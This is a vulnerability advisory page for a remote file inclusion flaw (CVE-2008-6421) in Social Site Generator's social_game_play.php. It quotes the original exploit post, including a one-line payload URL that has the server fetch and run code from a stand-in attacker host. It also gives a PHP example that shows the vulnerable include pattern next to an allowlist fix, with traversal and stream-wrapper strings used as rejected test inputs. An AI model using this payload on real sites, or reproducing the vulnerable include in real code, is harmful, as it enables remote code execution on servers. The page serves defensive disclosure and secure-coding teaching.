Social Site Generator 'social_game_play.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1115313    Vulnerability type: Code injection (remote file inclusion)
Published: 2008-05-31    Updated: 2009-03-13
CVE ID: CVE-2008-6421    CNNVD ID: CNNVD-200903-131
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/5707
https://www.securityfocus.com/bid/29462
https://cxsecurity.com/issue/WLB-2009030149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-131
|Vulnerability details
Social Site Generator (SSG) is a tool for building social networking (SNS) platforms. In SSG 2.0, social_game_play.php contains a PHP remote file inclusion vulnerability: the value of the `path` request parameter is passed to an include statement without validation. A remote, unauthenticated attacker who supplies a URL in the `path` parameter can have the server fetch and execute arbitrary PHP code from a host they control, provided the PHP configuration permits URL includes (allow_url_include, or allow_url_fopen on PHP releases older than 5.2).
|Exploit (PoC)
< ------------------- vBmad ------------------- >

############################################################################################
#
# Application Name : Social Site Generator
#
# Download         : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type  : RFI (remote file include)
#
# Dork             : search it :p
#
# Vulnerable file  : social_game_play.php
#
# author           : vBmad
#
# Team             : nab3 Team & hamama team
#
# Greatz           : ALLAH
#                    rouchtekh & jonelo & okx all hackerz moroccan & bigg thnx to my teacher Roi-PhP
#                    www.nab3i.com & www.nab3.2007.fr & www.maroc-mp3.net
#
#
############################################################################################

< ------------------- vBmad ------------------- >|
\        /                                                          |
  \    /          uhh@hotmail.fr                            |
    \/__________________________________|


< -- Bug -- >

Exploit :

http://target/path/social_game_play.php?path=http://Evil-script?

< -- Bug -- >

#The majority of the versions are infected

# milw0rm.com [2008-05-31]
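The details section above describes the flaw and the PoC shows the payload shape (`?path=http://Evil-script?`). The following is an added example written for this page; it is not Social Site Generator's source and not the exploit author's code. It reconstructs the likely vulnerable pattern and places a hardened replacement beside it. Two things are assumptions: that the script appends a fixed `.php` suffix to the parameter (inferred from the trailing `?` in the PoC, which turns such a suffix into a harmless query string on the attacker's server), and the game names `tetris`, `snake`, `chess`, which are hypothetical allowlist entries.

```php
<?php
declare(strict_types=1);

// Added example, not code from Social Site Generator or from the exploit author.
// The advisory says only that social_game_play.php includes whatever the `path`
// parameter names. The published PoC ends the URL with "?", the usual trick when
// the script appends a fixed suffix (assumed here to be ".php"): the request
// "http://evil/shell?.php" is still a valid URL, and the suffix becomes a query
// string the attacker's server ignores. The vulnerable shape below is therefore a
// reconstruction, not the real SSG source.

// --- Vulnerable pattern (assumed) -------------------------------------------
function vulnerable_game_include(string $path): void
{
    // With allow_url_include=On (or, before PHP 5.2, allow_url_fopen=On),
    // include/require accept http:// and ftp:// URLs and execute the response.
    include $path . '.php';
}

// --- Hardened replacement ----------------------------------------------------
// Game names are hypothetical; the point is that user input selects a key in an
// allowlist and is never concatenated into a filesystem or URL path.
const ALLOWED_GAMES = ['tetris', 'snake', 'chess'];

function is_allowed_game(string $requested): bool
{
    // Strict comparison avoids PHP's loose type juggling (0 == 'tetris' was true before PHP 8).
    return in_array($requested, ALLOWED_GAMES, true);
}

function resolve_game_script(string $requested, string $gameDir): ?string
{
    if (!is_allowed_game($requested)) {
        return null;
    }
    // The path is built by us from a known-good name; the raw input never reaches include().
    $candidate = $gameDir . DIRECTORY_SEPARATOR . $requested . '.php';
    // Defence in depth: canonicalise and confirm the target still lies inside $gameDir.
    $real = realpath($candidate);
    $base = realpath($gameDir);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function safe_game_include(string $requested, string $gameDir): bool
{
    $script = resolve_game_script($requested, $gameDir);
    if ($script === null) {
        http_response_code(400);
        echo "Unknown game\n";
        return false;
    }
    include $script;
    return true;
}

// --- Stand-alone demonstration: php this_file.php ----------------------------
if (PHP_SAPI === 'cli') {
    // Constructed inputs: two legitimate names, the PoC payload, a traversal attempt,
    // and a PHP stream wrapper. Only the allowlisted names pass.
    $inputs = ['tetris', 'chess', 'http://Evil-script?', '../../etc/passwd', 'php://input'];
    foreach ($inputs as $in) {
        printf("%-22s -> %s\n", $in, is_allowed_game($in) ? 'allowed' : 'rejected');
    }
}
```

The allowlist check is what removes the vulnerability class; the `realpath` prefix test in `resolve_game_script` is a second layer that catches a misconfigured game directory or a stray symlink. Disabling `allow_url_include` in php.ini is still worth doing as a server-wide mitigation, but it does not help against local file inclusion through the same parameter, which is why the code fix should not rely on it.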
|Affected products
Social Site Generator / Social Site Generator 0
|References

Source: XF
Name: socialsitegenerator-path-file-include(42780)
Link: http://xforce.iss.net/xforce/xfdb/42780
Source: BID
Name: 29462
Link: http://www.securityfocus.com/bid/29462
Source: MILW0RM
Name: 5707
Link: http://www.milw0rm.com/exploits/5707
Source: SECUNIA
Name: 30462
Link: http://secunia.com/advisories/30462
Source: OSVDB
Name: 45865
Link: http://osvdb.org/45865